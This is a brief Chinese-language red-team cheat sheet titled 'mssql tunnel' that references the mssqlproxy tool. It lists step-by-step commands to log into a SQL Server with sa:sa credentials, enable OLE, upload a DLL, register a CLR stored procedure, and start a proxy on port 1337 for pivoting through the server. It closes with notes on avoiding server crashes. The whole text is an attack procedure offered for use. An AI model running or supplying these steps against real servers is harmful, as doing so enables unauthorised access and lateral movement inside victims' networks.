mssql隧道

https://github.com/blackarrowsec/mssqlproxy

# 连接mssql
python mssqlclient.py sa:sa@192.168.1.1
# 启用ole
enable_ole
# 上传reciclador.dll
upload reciclador.dll c:\programdata\reciclador.dll
# 开启clr，注册存储过程Microsoft.SqlServer.Proxy
python mssqlclient.py sa:sa@192.168.1.1 -install -clr Microsoft.SqlServer.Proxy.dll
# 检查CLR已准备好
python mssqlclient.py sa:sa@192.168.1.1 -check -reciclador c:\programdata\reciclador.dll
# 开启代理，默认为TCP 1337，可通过-local-port设置
python mssqlclient.py sa:sa@192.168.1.1 -start -reciclador c:\programdata\reciclador.dll

PS:
1. 如果通过代理访问，需要设置-no-check-src-port
2. 仅支持IPv4
3. 并发过高会导致mssql服务crash
4. 关闭代理请使用ctrl+C,否则可能导致服务器crash